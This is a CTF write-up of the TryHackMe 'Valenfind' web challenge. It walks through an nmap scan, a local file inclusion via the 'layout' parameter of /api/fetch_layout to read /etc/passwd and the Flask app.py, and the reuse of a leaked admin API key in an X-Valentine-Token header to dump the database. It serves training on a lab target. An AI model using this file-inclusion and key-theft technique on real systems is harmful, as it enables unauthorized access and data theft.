Andrew Kapaldo

Andrew Kapaldo

Security researcher & CTF enthusiast

ValenFind

2 minute read

🌐 Love at First Breach 2026 - Valenfind

Category Author
🌐 Web TryHackMe

Challenge Prompt

My Dearest Hacker,

There’s this new dating app called “Valenfind” that just popped up out of nowhere. I hear the creator only learned to code this year; surely this must be vibe-coded. Can you exploit it?

You can access it here: http://MACHINE_IP:5000

Problem Type

  • Local File Inclusion (LFI)

Solve

We will start by running a quick nmap scan on the host and port to see what is running on the IP and port with
nmap -p 5000 -T4 -A IP_ADDRESS: 2026-02-14_16-35-45

This shows we have Python running, so maybe a Flask app.

Next we will visit the site as instructed. When we load it up, we see the ValenFind app: 2026-02-14_16-01-53

If we click the Start Your Journey button we can create an account: 2026-02-14_16-02-50

I used a for my username and password123, just so it was easy to remember. Then we are taken to complete our profile. We can fill that out and then click Finish Profile & Start Dating: 2026-02-14_16-04-19

On the next page, we are given Potential Matches. Scrolling through the list the Cupid user looks most interesting with 999 likes: 2026-02-14_16-06-13

If we click the Profile button, we can see this user “Keeps the Database Secure”. 2026-02-14_16-07-12

Let’s see if there is anything interesting here. If we right click and pick “View Page Source”, part way down in the JavaScript, there is a comment labeled Vulnerability.

2026-02-14_16-08-49

It seems the layout parameter allows for LFI (Local File Inclusion)! Let’s fire up Burpsuite and see if we can exploit that.

I use FoxyProxy in Firefox, but you can use the built in browser in Burp if you like. We will send a request and intercept it, then send that to repeater so we can modify it. 2026-02-14_16-22-40

Since I captured a POST request, I had to change mine over to a GET instead and the added the URL we want to try to abuse: /api/fetch_layout?layout=. I tested with the /etc/passwd file and as you can see this works and we are provided the file. 2026-02-14_16-28-37

The next thing I tried was to send something that shouldn’t work in this case, just 2 periods (..). This returns an error that it couldn’t load /opt/Valenfind/templates/components/.. with the .. being what we sent: 2026-02-14_16-32-40

Then we can take the file path we found and try to add app.py to the end since as we found at the start, this may be a Flask app. This results in a error that the file wasn’t found: 2026-02-14_16-38-03

I worked my way down the file path until I got to /opt/Valenfind/app.py and there we got a return! On line 17 we see an Admin API key too! 2026-02-14_16-42-18

As I read through the rest of the code, on line 229 I found an export_db API function. This function requires a special header (Line 231) X-Valentine-Token that must match the ADMIN_API_KEY (line 233) from above. 2026-02-14_16-43-24

Trying that gives us the flag! 2026-02-14_16-48-57

You May Also Enjoy

Try Heart Me

1 minute read

🌐 Love at First Breach 2026 - TryHeartMe

Speed Chat

1 minute read

🌐 Love at First Breach 2026 - Speed Chat